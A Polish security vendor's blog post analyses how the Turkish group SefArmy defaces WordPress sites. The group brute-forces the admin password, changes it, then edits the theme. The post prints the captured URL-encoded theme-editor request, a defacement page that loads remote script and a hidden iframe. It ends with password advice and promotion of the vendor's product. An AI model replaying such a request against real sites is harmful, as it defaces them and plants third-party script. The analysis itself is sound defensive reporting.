Jak hakerzy z SefArmy włamują się na witryny oparte na WordPressie?

SefArmy to grupa hackerska pochodząca z Turcji, która podmienia strony internetowe na całym świecie. Podczas analizy ich włamań na nasze specjalnie przygotowane witryny, nie stwierdziliśmy innych działań niż właśnie podmiana strony internetowej.

Zauważyliśmy dość proste i powtarzające się ataki. Większość z nich przebiega w następujący sposób: hakerzy próbują włamać się na naszego Wordpssa za pomocą złamania hasła do panelu administracyjnego. Po udanym ataku hakerzy natychmiast odcinają nam dostęp do panelu administracyjnego poprzez zmianę hasła administratorom na bardzo skomplikowane. Jest ono praktycznie niemożliwe do złamania:

Po zmodyfikowaniu hasła atakujący przechodzą od razu do edytora aktualnie używanego tematu graficznego, aby zmienić go na poniższy:

Dokładne zapytanie wysyłane do serwera wygląda następująco:

_wpnonce=9a22c55ca9&_wp_http_referer=%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dindex.php%26theme%3Dtwentyfourteen&newcontent=%0D%0A%3C%21--+start%3A+index+--%3E%0D%0A%3Chead%3E%0D%0A%3Clink+rel%3D%22icon%22+href%3D%22http%3A%2F%2Fi.hizliresim.com%2FYq645E.png%22%3E%0D%0A%3Ctitle%3EH4ck3d+By+SefArmy%3C%2Ftitle%3E%0D%0A%3Clink+href%3D%22https%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffamily%3DOswald%22+rel%3D%22stylesheet%22%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody+bgcolor%3D%22black%22%3E%3Cbr%3E%0D%0A%3Ccenter%3E%3Cimg+src%3D%22http%3A%2F%2Fizlesenevideo.net%2Fuploads%2Fd6723e7cd6735df68d1ce4c704c29a04.gif%22%3E%3Cbr%3E%0D%0A%3Cbr%3E%3Cbr%3E%0D%0A%3Cfont+style%3D%22color%3A+white%3B+font-weight%3A+bold%3Bfont-family%3AOswald%3Btext-shadow%3A+0px+2px+purple%3B+font-size%3A35px%3B%22%3EHacked+By+SefArmy+%3C%2Ffont%3E%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cfont+style%3D%22color%3A+white%3B+font-weight%3A+bold%3Bfont-family%3AOswald%3Btext-shadow%3A+0px+2px+purple%3B+font-size%3A21px%3B%22%3E%3Cfont+color%3D%22red%22%3Edeadlycrew.info%3C%2Ffont%3E%3C%2Ffont%3E%3C%2Fcenter%3E%0D%0A%0D%0A%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Ccenter%3E%3Cfont+style%3D%22color%3A+white%3B+font-weight%3A+bold%3Bfont-family%3AOswald%3Btext-shadow%3A+0px+2px+purple%3B+font-size%3A20px%3B%22%3EDOSTLARIM+%3A%3Cfont+color%3D%22red%22%3E%3A%3C%2Ffont%3E+GreeDY_Corvus_Hilfulfudul_Wenzy_Deadly-Warrior_Akan_R4koo+118_ARC4DE%3C%2Ffont%3E%3C%2Fcenter%3E%3C%2Fcenter%3E%0D%0A%3Ciframe+allowfullscreen%3D%22%22+frameborder%3D%220%22+height%3D%220%22+src%3D%22https%3A%2F%2Fwww.youtube.com%2Fv%2FUoHjlLKSZ40%26amp%3Bautoplay%3D1%22+width%3D%220%22%3E%3C%2Fiframe%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22http%3A%2F%2Fis.sitekodlari.com%2Fsagtusengelleme1.js%22%3E%3C%2Fscript%3E%0D%0A%3C%21--wWw.KraLaLemi.Com++kod+baslangici--%3E%0D%0A%0D%0A%3Cscript+language%3D%22JavaScript1.2%22%3E%0D%0A%0D%0Afunction+disableselect%28e%29%7B%0D%0Areturn+false%0D%0A%7D%0D%0A%0D%0Afunction+reEnable%28%29%7B%0D%0Areturn+true%0D%0A%7D%0D%0A%0D%0A%2F%2Fif+IE4%2B%0D%0Adocument.onselectstart%3Dnew+Function+%28%22return+false%22%29%0D%0A%0D%0A%2F%2Fif+NS6%0D%0Aif+%28window.sidebar%29%7B%0D%0Adocument.onmousedown%3Ddisableselect%0D%0Adocument.onclick%3DreEnable%0D%0A%7D%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%3C%21--www.wWw.KraLaLemi.Com+kod+sonu--%3E%0D%0A%09%09++++++++++++++++%3C%21%E2%80%94wWw.KraLaLemi.Com++Kod+BasLangiCi--%3E%3Cstyle%3E%2F*Kralalemi+START*%2Fbody%2C+a%3Ahover%2C+a%2C+h1%2C+h2%2C+h3%2C+table%2C+td%2C+div%2C+p%2C+img++%7Bcursor%3A+url%28http%3A%2F%2Fwww.kralalemi.com%2Fimages%2FHtml%2FMauSe%2F3.png%29%2C+progress+%21important%3B%7D%2F*Kralalemi+STOP*%2F%3C%2Fstyle%3E%3C%21%E2%80%94wWw.KraLaLemi.Com+Kod+Sonu--%3E%0D%0A%09%09%09%09%09%09%3C%21%E2%80%94wWw.KraLaLemi.Com++Kod+BasLangiCi--%3E%3Cimg+border%3D%220%22+style%3D%22left%3A+0px%3B+position%3A+absolute%3B+top%3A+0px%3B%22+alt%3D%22T%C3%9CRK%C4%B0YE+CANIM+FEDA%22+border%3D%220%22+++src%3D%22http%3A%2F%2Fwww.kralalemi.com%2FHtml-Kodlari%2Fimages%2Fsol-bayrak1.jpg%22+%2F%3E%3Ccenter%3E%3C%21%E2%80%94wWw.KraLaLemi.Com+Kod+Sonu--%3E%0D%0A%0D%0A%3C%2Fbody%3E%0D%0A%3C%21--+end%3A+index+--%3E&action=update&file=index.php&theme=twentyfourteen&scrollto=450&docs-list=&submit=Update+File

Po zmianie tematu atakujący podmieniają również teksty stron w Wordpssie na takie, jak wskazaliśmy powyżej. Identyczne ataki, często powtarzające się (nawet jeśli skutki zostaną usunięte, to hakerzy wracają i próbują ponownie włamywać się na witryny) wykryliśmy za pomocą Webanti już pod koniec roku 2016. Ciekawe jest to, że na naszych specjalnie przygotowanych stronach atakujący skupiają się wyłącznie na próbie łamania haseł, mimo tego że potencjalnie istnieją także inne możliwości zaatakowania witryn. Wyniki naszych „prowokacji” dowodzą że stron Wordpss z bardzo słabym i słownikowym hasłem administratora jest tak wiele, że hakerom opłaca się próbować różnych metod łamania haseł. Jest to bardzo zła wiadomość z dwóch powodów:

  1. właściciele Wordpressów są na tyle niewyedukowani w aspekcie bezpieczeństwa, że ustawiają proste hasła do swoich kont administracyjnych,

  2. wiedza, jaką muszą posiadać hakerzy do przeprowadzenia udanego ataku jest minimalna, wystarczy prosty program łamiący hasło.

Dlatego to najwyższa pora, żebyście zaczęli stosować silne, trudne do zgadnięcia hasła. Jak je stworzyć? Wystarczy stosować się do poniższych wskazówek:

  • dobre hasło powinno mieć minimum 12 znaków

  • zapomnij o hasłach słownikowych -- czyli takich, które składają się ze znanych słów, nazw własnych itp.

  • nie wykorzystuj dat (w żaden sposób, tych pisanych wspak również!)

  • nie używaj mnemotechniki – hakerzy również znają tę metodę

  • posłuż się małymi i dużymi literami, cyframi oraz znakami specjalnymi (!@#$%^&*(){}":|"':;><,./?).

Dodatkową ochroną zapewni Twojej stronie konto w webanti.com. Dzięki niemu w razie włamania zostaniesz o nim natychmiast powiadomiony. Webanti.com pomoże Ci także usunąć skutki ataku za pomocą łatwego panelu webowego.

Przetestuj darmową ochronę

Jak mówią – lepiej zapobiegać niż leczyć. Dotyczy to także bezpieczeństwa stron internetowych. Każdego roku zwiększa się ilość cyberprzestępstw wynikających z działalności hakerów bądź szkodliwego oprogramowania przez nich tworzonego. Wirusy/malware, ransomware, backdoor – lista zagrożeń jest długa. Na szczęście istnieją skuteczne sposoby zapobiegania im. Sprawdź, jak o bezpieczeństwo Twojej strony zadba Webanti.

Webanti to oprogramowanie antywirusowe, które umożliwia ochronę witryny internetowej w czasie rzeczywistym, a w przypadku próby ataku przez hakerów poinfrmuje właściciela strony.

Jesteś zainteresowany? Narzędzie Webanti możesz przetestować za darmo. W razie pomocy możesz także skorzystać z pomocy naszych konsultantów – 7 dni w tygodniu, przez całą dobę, przez cały rok.

Zaufaj wiedzy specjalistów i zacznij skutecznie chronić swoją stronę – sprawdź Webanti.